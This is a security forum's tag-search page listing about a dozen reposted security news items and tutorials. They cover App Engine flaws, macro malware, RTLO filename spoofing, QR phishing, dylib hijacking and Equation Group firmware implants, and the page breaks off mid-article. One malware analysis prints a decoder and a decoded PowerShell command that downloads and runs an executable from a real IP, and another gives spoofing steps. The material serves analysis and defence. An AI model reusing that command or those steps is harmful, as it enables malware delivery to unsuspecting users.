Jump to content

Search the Community

Showing results for tags 'malicious'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 19 results

  1. Vulnerabilities in the Google App Engine cloud platform make it possible for attackers to break out of a first-level security sandbox and execute malicious code in restricted areas of Google servers, a security researcher said Friday. Adam Gowdiak, CEO of Poland-based Security Explorations, said there are seven separate vulnerabilities in the Google service, most of which he privately reported to Google three weeks ago. So far, he said, the flaws have gone unfixed, and he has yet to receive confirmation from Google officials. To exploit the flaws, attackers could use the freely available cloud platform to run a malicious Java application. That malicious Java app would then break out of the first sandboxing layer and execute code in the highly restricted native environment. Malicious hackers could use the restricted environment as a beachhead to attack lower-level assets and to retrieve sensitive information from Google servers and from the Java runtime environment. Technical details about the bugs, noted as issues 35 through 41, are available here, here, here, and here. In an e-mail to Ars, Gowdiak wrote: Gowdiak took to the Full Disclosure e-mail list to disclose the bugs and to call Google out for not responding to his private advisory, which he said included proof-of-concept exploit code. "It's been 3 weeks and we haven't heard any official confirmation / denial from Google with respect to Issues 37-41," Gowdiak wrote. "It should not take more than 1-2 business days for a major software vendor to run the received POC, read our report and / or consult the source code. This especially concerns the vendor that claims its 'Security Team has hundreds of security engineers from all over the world' and that expects other vendors to react promptly to the reports of its own security people." Google has received criticism in the past when its Project Zero has disclosed vulnerabilities in Windows and Mac OS X before Microsoft and Apple had patched them. Asked for comment on Gowdiak's Full Disclosure post, a Google spokesman issued the following statement: "A researcher recently reported a known issue affecting a preliminary layer of security in Google App Engine. We’re working with him to mitigate it; users don’t need to take any action." Source
  2. Apparently harmless document files that contain a malicious macro are commonly used by cybercriminals to distribute malware. However, malicious actors continue to improve their methods in an effort to evade detection. Security researcher Bart Blaze has come across a bogus invoice spam email apparently containing a Microsoft Word document (.doc). When the document is opened, if macros are not enabled, the user is instructed to enable macros in order to view the content. Once macros are enabled, the victim is presented with an image, while in the background a piece of malware is downloaded onto the computer. It’s worth noting that macros are disabled by default in Microsoft Office. Attaching malicious macros to documents is not uncommon, but the sample analyzed by Blaze is a bit different. The document is actually an MHTML, or a Multi-Purpose Internet Mail Extension (MIME) HTML file. MHTML (.mht) is a web page archive format used to combine HTML code and other resources (e.g. images, Java applets and Flash animations) in a single document. The malicious MHTML file contains an MSO object, which in turn contains an OLE object. When the file is launched, a VBS file is downloaded from Pastebin and executed. The VBS file is designed to download and execute a Trojan downloader, which in turn downloads a piece of malware. VirusTotal links provided by Blaze suggest that the final payload is a banking Trojan. The expert told SecurityWeek that the threat is very likely the notorious Dyre. The researcher has noted that attackers can build such malicious documents by creating an MHT file, appending the MSO object at the end, and renaming the resulting file with a .doc extension. The developer of olevba, a tool designed for the analysis of malicious macros hidden inside Microsoft Office documents, has pointed out that there is an even easier method. Cybercriminals can open a Word document with macros, save it as an MHTML from Word, and rename the file extension from .mht to .doc. Belgium-based researcher Didier Stevens, the developer of the OLE file analysis tool oledump, noted in a blog post that MSO files containing OLE files were previously seen in March, when cybercriminals were using XML Office documents to distribute the Dridex financial malware. “It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email,” Blaze advised in his blog post. “If you're in an organisation, you might want to consider blocking the execution of all macros (or only the ones that are digitally signed) by using GPO.” Sursa
  3. In this article we will learn about the one of the most overlooked spoofing mechanisms, known as right to left override (RTLO). What is RTLO? RIGHT TO LEFT OVERRIDE is a Unicode mainly used for the writing and the reading of Arabic or Hebrew text. Unicode has a special character, U+202e, that tells computers to display the text that follows it in right-to-left order. This vulnerability is used to disguise the names of files and can be attached to the carrier like email. For example, the file name with ThisIsRTLOfileexe.doc is actually ThisIsRTLOfiledoc.exe, which is an executable file with a U+202e placed just before “doc.” Though some email applications and services that block executable files from being included in messages also block .exe programs that are obfuscated with this technique, unfortunately many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. For example, let’s create a file with Name TestingRTLO[u+202E]xcod.txt. “U+202E” can be copied and pasted from the above character map present in Windows. To make sure something is present in the character, do the following steps: Create a new text document and see its properties and note down its name: Now rename the file with the copied U+202E characters and see the change in file name: Now rename the File TestingRTLO[u+202E]xcod.txt with characters inserted and see the below results. File extension types that can be dangerous The below section lists the common file types that can be used to execute unwanted code in the system: .bat .exe .cmd .com .lnk .pif .scr .vb .vbe .vbs .wsh Remediation against RTLO Though most endpoint security solutions like antivirus detect this type of spoofing, and some IRC clients even change the crafted malicious links back to original form, many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. The biggest example of this is in the usage of the backdoor “Etumbot”. Some features of Windows also help to carry this type of attack, such as Windows hides the file extensions by default. Malicious individuals can set any icon they want for let’s say a .exe file. A file named pic.jpg.exe using the standard image icon will look like a harmless image with Windows’ default settings. Uncheck this selection and Windows will stop hiding extension for known file types. Another good approach is to make sure that the folder where all the downloads take place should have its view set to ‘content’. This will make sure that the files will appear in their original form despite all the changes. Though this technique is a bit old, it is still being used in backdoors like Etumbot, malware known as Sirefef, etc. Source
  4. With the increasing use of smartphones, QR codes are becoming popular. Recently, WhatsApp launched its web version, which needs QR code scanning to access the web version of WhatsApp. So, many people now know what QR code is, but still more are unaware. It is very similar to a bar code we see in products, but it does not need a different reader. Our smartphone camera can easily read it with the help of a QR code scanner app. Due to fast readability, it is now widely accepted. And the use of QR codes is increasing. With the scan of a QR code, we can perform various tasks which would otherwise need a lot more effort. For example, scan a QR code and save the business card details in your smartphone. This is why people like to use QR code scanning for general tasks. But most users are not aware that QR codes can also be malicious. This is why scammers are now using malicious QR codes for tricking users. In this article, I will discuss QR codes in details. I will also try to cover all the potential security issues related to QR codes. QR Codes QR code (or Quick Response code) is a matrix bar code which can be read by an imaging device (camera) and then processed to read its data. It was initially developed for the automotive industry in Japan, but now it is being used by many companies. You will be surprised to know that the QR code was invented back in 1994 by Denso Wave. Nowadays QR codes are being used to display text to users, to save a vCard contact information to the user’s smartphone, to open a website URL, to code payments, for website login (ex: WhatsApp web login) or to compose an e-mail or text message just by scanning a QR code. QR codes are really useful and help us to complete tasks faster in smartphones. You can quickly open a website just by scanning a QR code and you do not need to manually type the URL in your smartphone. This is why many websites’ poster ads now contain QR code. Another popular use is on a business card. Now people also include QR code in their business cards. So, other persons can simply scan the QR code to save the contact details in their smartphone. See the sample QR code below. This is for opening a website. QR code for: IT Security Training & Resources by InfoSec Institute Scanning the above QR code will open IT Security Training & Resources by InfoSec Institute. How to Generate QR Codes There are various tools available for this. If you want to generate a QR code with specific information, you can use these tools, which let you create QR code for URL, text, vCard, SMS, call, geo-location, event, email and login. Different tools have different abilities. A few good QR code generator tools are: https://www.the-qrcode-generator.com/ QR Code Generator – create QR codes for free (Logo, T-Shirt, vCard, EPS) QR Code Generator - Create QR codes here http://www.qrstuff.com/ https://scan.me/qr-code-generator You can use any of the above tools to generate your own QR code. Lifespan of QR codes This is a question about QR code people generally ask. QR code does not need any platform for redirection, but it has data within it. Once a QR code is generated, it can be used anytime, anywhere. The lifespan of the QR codes is unlimited, so you do not need to worry about lifespan. Generate and then use. Can QR codes be hacked? A QR code is the square matrix with small black square dots arrangement. Hacking a QR code means manipulation of the action without modifying the QR code. This is not possible. QR codes can be malicious and can trigger malicious action. But that QR code will not be the same as the legitimate QR code. Two QR codes with different actions will never be the same. You will certainly see different patterns in both QR codes. So, QR codes cannot be hacked. But It can be malicious and hackers can use a QR code for various malicious purposes. And there are various reports in which we have seen the malicious acts. Security Risks Involved with Use of QR Codes As I already discussed, QR codes can be malicious. So, there are various security risks involved with QR codes. In this section, I will discuss all the security risks involved with QR codes. Phishing Phishing is a popular way of hacking web accounts. Attackers send a fake web login page which pretends to be the original login page of the website it’s claiming to be. When an innocent user use this fake page to login, his/her login information is sent to the attacker. And now, his/her password is in the hands of the attacker. Phishing is the main security issue involved with QR codes. It is also described as QRishing by some security researchers. QR codes are generally scanned by a smartphone camera to visit a website. Now, many website ads put QR code along with a URL so users can quickly scan QR code to visit the website. This is where scammers try to trick users. As I already told you, QR codes cannot be hacked. So, hackers or scammers try to change the QR code added in the poster. They can also print the similar kind of fake posters and put in public places. Innocent customers will scan these fake QR codes to visit the websites but they will be redirected to phishing websites. Most people judge a website by its look and feel, and phishing pages look exactly similar to legitimate websites. In mobile devices, it is hard to check the full address in the browsers. Due to limited space, browsers do not show the full address in the URL field. And most people never try to check the full address. This makes users more vulnerable. When they use this phishing page to login, their passwords are compromised. Although this phishing trick has limited scope, it is most effective. There are various case studies which clearly confirm that people generally trust QR codes and become the victim of QRishing at public places. Malicious software distribution Scammers generally use malicious websites to distribute malware via drive by download attack. Nowadays, most of the drive by download attacks are being done against Android users. Drive by download attacks are attacks in which a website forcefully downloads software in your device when you visit the website. It does not need any action from the user’s side. Visiting the website is enough to trigger the download action. Scammers try to install malicious apps and then exploit that device. These infected devices can join an existing botnet or can send SMS to premium numbers. It can also leak your data. By using QR codes to point to this kind of malicious websites, we can easily trick users. Users cannot see the URL, so there is no point of doubt. In QR codes, there is no need to enter the URL manually, users only scan QR code. And they only know what you will write about the QR code. In Russia, a malicious QR code on scanning sent SMS to premium numbers costing $5 USD per SMS. Most of these kinds of attacks have been seen against Android devices. Pointing to potentially harmful websites This is similar to what we learned in the previous point, but it is not about serving malware. Sometimes websites have browser exploits which can do lot more harm. Browser exploits can enable microphone/camera access, access browser data, send emails or join a botnet to perform a DDOS attack on any legit website. All these actions occur in the background, so users never know about this. They will only see a website, but they are being tricked. How to Protect Yourself from Malicious QR Codes Malicious QR codes have limited scope, but may be harmful. So, you need to be protective and always take care of your security while using QR codes. If you are going to use it from banners at public places, you need to be selective. There are few things which you can do to protect yourself from malicious QR codes and its attacks. Observe before use: If you find a QR code in any banner advertisement in a public place, look at it closely. Most of the times, scammers stick their fake QR code above the legitimate QR code in a legitimate poster. So try to see if it is real or not. You can check by touching the poster. If it does not look like it’s actually printed on the poster, do not use it. Follow this guideline for QR codes in public places. Your observation can save you from attacks. If you are not sure, never scan that QR code. Be suspicious and never giver personal or login info: Always be suspicious of the page you land on via QR code. Never share your personal information on these pages. Only do this if the QR code is from a very trusted source and you trust the website. And yes, avoid entering your login information. It may be a phishing page. So for login, always enter the URL manually on the browser’s address bar. Entering login information on the pages you land on via QR code means putting yourself in big trouble. So, why take the risk just to avoid a little extra effort? Open a browser, type the address and login directly on the website. Look at URL before proceeding: A few QR code scanners also show the actual URL before proceeding and ask to confirm whether you want to visit the URL. You can use these QR code scanners to know what URL the QR code will send you. This will help you to know if the QR code is malicious or not. Looking at the QR code does not confirm whether it is malicious or not. So, I recommend use of safe QR code scanners. Norton Snap is a nice QR code scanner app with built-in security features. This app is available for both Android and iOS platforms. You can use this QR code scanner app to prevent any malicious activity in your smartphone. It not only shows the URLs but also checks the URLs within its database of malicious links. If it finds any malicious URLs within the QR code, it will warn you. Conclusion Although QR codes are not new, their use is still very limited. With the increasing use of smartphones, we have seen sudden a rise in the use of QR codes. Now various websites and apps let users use a QR code to login or complete other tasks. But there are still very few users who use QR codes. This is the reason why there is little reporting on malicious QR codes. Nobody wants to waste time on things which have low impact. But this will change very soon. With the launch of WhatsApp for web, now many users know how to use QR codes. So, we can expect another sudden rise in the use of QR codes. And when it is used by a greater number of users, attackers will surely find new ways to exploit its weaknesses. As of now, QR code risks have limited scope, but when there are more users, there will surely become a bigger risk. In the near future, we will also see the use of QR codes for payments and money transfer. At that time, it will be very important to follow security rules. As of now, we only need to use a good and secure QR code scanner app and then relax. Having a good anti-virus and Internet security app is also recommended. This will warn if a website is a phishing website or trying to install a dangerous app in your smartphone. I hope you have found this article interesting. If you use QR code, do not forget to be safe. References http://usa.kaspersky.com/about-us/press-center/press-blog/malicious-qr-codes-attack-methods-techniques-infographic https://www.andrew.cmu.edu/user/nicolasc/publications/Vidas-USEC13.pdf http://en.wikipedia.org/wiki/QR_code Source
  5. Researchers have seen an uptick in Adobe Flash .SWF files being used to trigger malicious iFrames across websites. Several hundred WordPress and Joomla websites have been swept up in the campaign, first observed by researchers at the firm Sucuri last November. “Though it’s uncertain how many iterations existed in the wild when we first reported the issue, this time we’ve found a lot of websites where the infection looks similar,” Peter Gramantik, a senior malware researcher at the firm wrote Thursday. According to Gramantik the infection is clearly marked by a .SWF file with three random characters as a name that’s stored in a site’s images/banners/ folder. As far as the firm has seen, each file has a random hashed ID parameter attached to the end of it. While the malware’s variable names, coding logic, and UserAgent remain the same, one of the main differences from last November’s version of the campaign and this one is that this incarnation has spread to from Joomla sites to WordPress sites. As is to be expected, the website delivering the malicious payload has changed as well. The .SWF files, also known as small web format files, inject an invisible iFrame, which can go on to drop other exploits. Source
  6. President Barack Obama has ordered the shoring up of sanctions that the US could use against individuals and nations that attack the country with cyber tools and threats. No new sanctions have been created, but Obama is keen to see existing measures applied with more force and frequency. The US has used these tools before, and they were raised during discussions about the alleged North Korea attack on Sony Pictures. The president presents his actions as a reaction to the real menace that is growing in scale and capability and continues to hurt US firms like Home Depot. "I find that the increasing prevalence and severity of malicious cyber-enabled activities originating from, or directed by, persons located, in whole or in substantial part, outside the US constitute an unusual and extraordinary threat to the national security, foreign policy and economy of the US. I hereby declare a national emergency to deal with this threat," he said. The response is a greater use of sanctions, and an increase in the powers available to the government, according to a White House blog post. "We are at a transformational moment in how we approach cyber security. The actions we take today will help ensure that the internet remains an enabler of global commerce and innovation," said Lisa Monaco, US homeland security advisor to president Obama. "We need to deter malicious cyber activity and to impose costs in response to the most significant cyber intrusions and attacks, especially when those responsible try to hide behind international boundaries. "Effective incident response requires the ability to increase the costs and reduce the economic benefits from malicious cyber activity. We need a capability to deter and impose costs on those responsible for significant harmful cyber activity where it really hurts - at their bottom line." Businesses such as the US Postal Service have been attacked with greater frequency over the past year and, while international entities are not always blamed, China is a regular suspect. Sanctions can be imposed against a nation or an individual, and they are expected to be used only at times when US assets and infrastructure are under threat. Source
  7. DLL hijacking has plagued Windows machines back as far as 2000 and provides hackers with a quiet way to gain persistence on a vulnerable machine, or remotely exploit a vulnerable application. And now it’s come to Apple’s Mac OS X. This week at the CanSecWest conference in Vancouver, Synack director of research Patrick Wardle is expected to deliver a talk during which he’ll explain different attacks that abuse dylibs in OS X for many of the same outcomes as with Windows: persistence; process injection; security feature bypass (in this case, Apple Gatekeeper); and remote exploitation. “DLL hijacking has haunted Windows for a while; it’s been abused by malware by a number of malicious adversaries. It’s a fairly widespread attack,” Wardle told Threatpost. “I wondered if it was similar on OS X and I found an attack similar to that. Under the hood, there are technical differences, but it provides the same capabilities. Given you have a vulnerable app on OS X, you can abuse it the same way it’s abused on Windows.” Wardle is also expected to release following his talk source code for a scanner that discovers apps that are vulnerable to his attack. Running his Python script against his own OS X machine, Wardle was able to find 144 binaries vulnerable to different flavors of his dylib hijacking attacks, including Apple’s Xcode, iMovie and Quicktime plugins, Microsoft Word, Excel, and PowerPoint, and third-party apps such as Java, Dropbox, GPG Tools and Adobe plugins. “Windows is vulnerable to DLL hijacking, and now OS X is similarly vulnerable to dylib hijacking,” Wardle said. With DLL and dylib attacks, the concept is essentially the same: an attacker must find a way to get a malicious library into a directory that is loaded by the operating system. Wardle explained one facet of his attack where he was able to find a vulnerable Apply binary in its Photostream Agent that automatically started with iCloud. “It’s perfect for attacker persistence,” Wardle said. “You copy a specially crafted dylib into the directory PhotoStream looks for when the app starts, and the attacker’s dylib is loaded into the context of the process. It’s a stealthy way to gain persistence; you’re not creating any new processes, nor modifying any files. You’re planting a single dylib and you’re in.” In another attack, Wardle said he was able to gain automatic and persistent code execution via a process injection against Xcode, Apple’s integrated developer environment. “My malware infects Xcode and any time a developer deploys a new binary, it would also add the malicious code,” Wardle said. “It’s an anonymous propagation vector.” Wardle was also able to remotely bypass Apple’s Gatekeeper security product that limits what software can be downloaded onto an Apple machine and from where, in addition to providing antimalware protection. His malicious dylib code, he said, would be implanted in a download that should be blocked by Gatekeeper because it’s not signed from the Apple App Store. Gatekeeper, however, will load the malicious file remotely giving the attacker code execution, Wardle said. “Gatekeeper normally does a pretty good job of blocking these downloads, but now using this bypass, we can get users to infect themselves,” Wardle said. Wardle is expected to demonstrate an attack that combines all of these components, including the Gatekeeper bypass that when executed uses the dylib hijacking to gain persistence, grabs users’ files and exfiltrates that data to iCloud, and can also sent remote commands to the vulnerable machine. Most worrisome, he said, is that his malware went undetected by most antivirus packages, and Apple barely acknowledged his bug reports starting in January other than an automated response, and a thank you and congratulations on his talk being accepted at CanSecWest. “I think things are broken. This abuses legitimate functionality of OS X and it’s not patched,” Wardle said. “These attacks are powerful and stealthy, and do a lot of malicious things.” Source
  8. Malware analysts have had a measure of success using static mutex values as a fingerprint for detecting and blocking malicious code. These values are used in programming to enable software to synchronize communication between multiple threads or processes, or to determine whether another instance of a program is running already. There’s better reliability in using a mutex object in this way than checking for the presence of a process name, which could change. Malware writers, however, may have caught on to this fingerprinting technique. Lenny Zeltser, a SANS Institute instructor, said a malware sample he was examining dynamically generates the name of a mutex object by using the product ID associated with the software, lessening its predictability and complicating detection. “Given that malware analysts know to look for mutex names for ‘fingerprinting’ malicious software, it’s natural that authors of such programs will start shifting their techniques,” Zeltser said. “The technique that this malware used to generate the mutex name wasn’t especially elaborate, but it made it harder for the defenders to use this attribute for defending or investigating the system.” Malware evasion techniques are the epitome of the cat-and-mouse game between hackers and researchers. The LogPOS point-of-sale malware is a recent example of the constant evolution on the attackers’ side. The malware makes use of a Windows technology called mailslots to create a webserver; additional code is injected into various processes and acts as a client that moves stolen credit card data to the mailslot which then sends it to the attackers’ command and control infrastructure. Last October, academics at the University of California at Santa Barbara, made a plea for defenders to begin working on technology that spots evasive behavior. Security systems, said Giovanni Vigna, director of the Center for Cybersecurity at UCSB, must eventually elicit malicious behavior from malware before it executes. “The dynamic of action-reaction is common in the world of information security: The defenders find a way of interfering with the attackers, the attackers adjust tactics, the defenders tweak our methods, the attackers react, etc,” Zeltser said. The sample Zeltser studied a malware sample called TreasureHunter and today in a post on the SANS Internet Storm Center website, he describes how the malware transforms a computer’s specific Windows Product ID into a string that serves as the basis for its mutex. Not all malware samples make use of mutex objects, but those that do until now have hardcoded the name. Backoff, probably the most notorious point-of-sale malware in the wake of the mega Target and Home Depot breaches, named their mutexes in ways that were known to incident responders, Zeltser said. This scenario simplified detection for malware analysts, enabling them to use mutex names as indicators of compromise for Backoff infections, he said. For an attacker, the use of a static, hardcoded mutex name, also allows multiple instances of malicious code running on the infected host to refer to the same mutex, Zeltser said. TreasureHunter, he said, is the first time he’s seen malware move away from this static approach. “The author of TreasureHunter decided to use a more sophisticated approach of deriving the name of the mutex based on the system’s Product ID,” Zeltser explained in his post. “This helped the specimen evade detection in situations where incident responders or anti-malware tools attempted to use a static object name as the indicator of compromise.” Source
  9. OpenDNS has gone public with a new tool that uses a blend of analytics principles found outside information security to create a threat model for detecting domains used in criminal and state-sponsored hacking campaigns. NLPRank is not ready for production, said OpenDNS director of security research Andrew Hay, but the threat model has been proven out and false positives kept in check to the point where Hay and NLPRank’s developer Jeremiah O’Connor were satisfied that it could be shared publicly. What separates NLPRank from other analytics software that searches, for example, for typo-squatting domains used in phishing attacks, is that the OpenDNS tool also relies on natural language processing, ASN mappings, WHOIS domain registration information, and HTML tag analysis to weed out legitimate domains from the bad ones. The data comes from OpenDNS’ massive storehouses of DNS traffic (70 billion DNS queries daily), as well as from other sources provided by researchers investigating APT campaigns, for example. The spark for NLPRank’s development was a repeating pattern of evidence from a number of phishing attacks used to gain a foothold for APT groups. Certain themes such as fraudulent social media accounts or password reset requests purporting to be from popular services such as Facebook or PayPal were used to add urgency for the potential victim, enticing them to follow the link to trouble. “Using this malicious language and applying analysis to the domains, we can start picking them off prior to a campaign launching,” Hay said. O’Connor shared details in a blog post on the science behind the analytics, including algorithms used in bioinformatics and data mining, natural language processing techniques that allow him to develop a dictionary of malicious language used in these campaigns that helps the tool predict malicious domain activity. “NLPRank is designed to detect these fraudulent branded domains that often serve as C2 domains for targeted attacks,” O’Connor wrote, adding that the tool uses a minimum edit-distance algorithm used in spell-checkers and other applications to whittle down words used for typo-squatting domains and legitimate domains. “The intuition behind using this algorithm is that essentially we’re trying to define a language used by malicious domains vs. a language of benign domains in DNS traffic,” O’Connor said. Hay added that the domains used in the recently unveiled Carbanak APT bank heist, with losses anywhere between $300 million and $1 billion, were identified as malicious by NLPRank prior to the campaign going public during the recent Security Analyst Summit. Data from Carbanak, DarkHotel and other APT groups uncovered by Kaspersky Lab are among the data sets used to put NLPRank through its paces. “This has been incredibly successful in looking at phishing kits that, at face value, are identical to the parent company’s site,” Hay said, stressing that the tool looks at various low-level code, JavaScript hosted on the site, redirects and more in its analysis. “The model picks them off and starts analyzing the data, making sure it’s associated with the parent company, that it was registered by someone associated with the parent domain through the WHOIS information, looking at how embedded HTML may be different versus the parent company and determining how much it deviates from the parent site.” Eventually the tool will be folded into OpenDNS offerings, but Hay said more analysis capabilities, such expanded HTML and embedded script analysis, need to be added to further keep false positives at bay. “The false positive rate is low, but it’s not at point where we are comfortable putting it into production or turning on automated blocking,” Hay said. “We want additional inputs to the model, but so far it’s looking great.” Source
  10. Introduction Yesterday I received in my company inbox an email with an attached .xlsm file named D92724446.xlsm coming from Clare588@78-83-77-53.spectrumnet.bg. Central and local AV engines did not find anything malicious, and a multiengine scan got 0/57 as result. I decided to investigate a little more in-depth in order to confirm that was a malicious file and to extract at least the code I was imagining being inside this document. General Information This is some general info collected: Name: D92724446.xlsm MD5: fea3ab857813c0d65cd0b6b6233a834b SHA1: 64eef048efe86fe35f673fd2d853a8a727934e6c SHA256: 75e3a4cd45c08ff242e2927fa3b4ee80858073a202dade84898040bfbb7847ef ssdeep 768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP File size: 36.1 KB ( 36978 bytes ) File type: Office Open XML Spreadsheet Virus Total information: First submission: 2015-02-18 10:35:06 UTC Last submission: 2015-02-19 08:58:57 UTC Others names: 93D9B24583.xlsm e94fcc43b0dc9c7eb350149b4ebdfd3d 61a47fa44dd55f5721ebe85aa83a32e6 I233185_486.xlsm L335966_246.xlsm 271269885.xlsm 4501B81210.xlsm e65fb3285617c7b4bbc833a466be6c42 5312970.xlsm 9D50B4390.xlsm DDE1368393.xlsm E30178611.xlsm 43c29faad6fc5984273afcc67593d802 FE731885.xlsm C47394.xlsm suspect.xls 090214399.xlsm Q884674_740.xlsm E015272_266.xlsm U506714_083.xlsm 43925982.xlsm 8BB4D89313.xlsm.zip 82AC485705.xlsm 8abb99eb6078b658e05aece79337378a 0BF2034112.xlsm Static Analysis I started my analysis having a quick look inside: At offset 0 we can quickly view 4 bytes that confirm the format of the file (50 4B 03 04). At this point, I tried to get more information and to see how this document was composed: This quickly confirm my first suspicions. At offset 0x000012f1 a .bin file is found. Going a little ahead, we can try to get the code of these instructions: The code has been extracted, and different files for Classes and Modules have been created under \OfficeMalScanner\VBAPROJECT.BIN-Macros. Opening these files with a simple text editor, I immediately found many obfuscated instructions, as reported in the image below: However, after a quick analysis I realized that the modules really important for extracting of the malicious code were numbers 11 and 14. This is because the module number 11 contains the instructions for running the obfuscated code assigned to the variable named “FfdsfF” and de-obfuscated through the function call “NewQkeTzIIHM”. “NewQkeTzIIHM” takes one parameter in input as string and returns a string. These are its main instructions: The -13 immediately brings to mind a de-obfuscation loop which employs the rot13 algorithm. At this point, I simply wrote few lines of vbs code to correctly extract the content and print it to a txt file called output.txt. Function WriteFile(sText) Set objFSO = CreateObject("Scripting.FileSystemObject") Set objMyFile = objFSO.OpenTextFile( "C:\Users\EOSec\Desktop\output.txt", 8, true, 0 ) objMyFile.WriteLine(sText) objMyFile.close() End Function Dim i,x,y x = "pzq-<X-]|„r`uryy;r…r-5[r„:\owrp-`†€rz;[r;droPyvr{6;Q|„{y|nqSvyr54u}G<<B;>FC;?A@;D<x„rsr„rs<stq€rr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-€n-2aRZ]2iWV\v|qsuv|VU;r…rH" For i = 1 To Len(x) y = y + Chr(Asc(Mid(x, i, 1)) - 13) Next WriteFile(y) This is the clear code obtained: cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe; And this the whois of the remote IP: inetnum 5.196.243.0 – 5.196.243.7 netname Just_Hosting country IE descr Just Hosting admin-c OTC9-RIPE tech-c OTC9-RIPE status ASSIGNED PA mnt-by OVH-MNT source RIPE # Filtered A file named dxzq.jpg is downloaded. It’s really a CAB file (JIOiodfhioIH.cab) that is then expanded to JIOiodfhioIH.exe and run. Source
  11. Product Description IObit Malware Fighter 3 is an advanced malware & spyware removal utility that detects and removes the deepest infections and users’ most concerned online threats, and protects your PC from malicious behavior in real time. With IObit unique “Dual-Core” anti-malware engine, it’s able to detect the most complex and deepest malware, like spyware, adware, trojans, keyloggers, bots, worms, and hijackers, in a fast and efficient way! With the enhanced browser protection module, IObit Malware Fighter 3 will ensure you a full online surfing & pri Features: Full Anti-Malware Ability with Unique “Dual-Core” Engine Basic Real-time Protection against Malicious Behavior Comprehensive Real-time Protection for Top PC Security Prevent Virus Infection Carried by USB Disk Detect Malicious Process Running in RAM Detect Threats by Analyzing Malicious Action Intelligently Works in Background without Interrupting Automatic Update to the Latest Version Free 24/7 Technical Support on Demand -> Download <-Deal Expires in: EXPIRED!
  12. One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive’s firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—“surpasses anything else” they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named “nls_933w.dll”, is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don’t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here’s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquatinoDrug and one with a 2013 compilation date that is used with GrayFish. The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer’s operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one. The attack works because firmware was never designed with security in mind. Hard disk makers don’t cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don’t examine it. There’s also no easy way for users to read the firmware and manually check if it’s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. “You know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works,” Raiu says. The Kaspersky researchers have called it “an astonishing technical accomplishment and is testament to the group’s abilities.” Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation. Hidden Storage Is the Holy Grail The revelation that the firmware hack helps store data the attackers want to steal didn’t get much play when the story broke last week, but it’s the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there’s still a lot that’s unknown about the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes 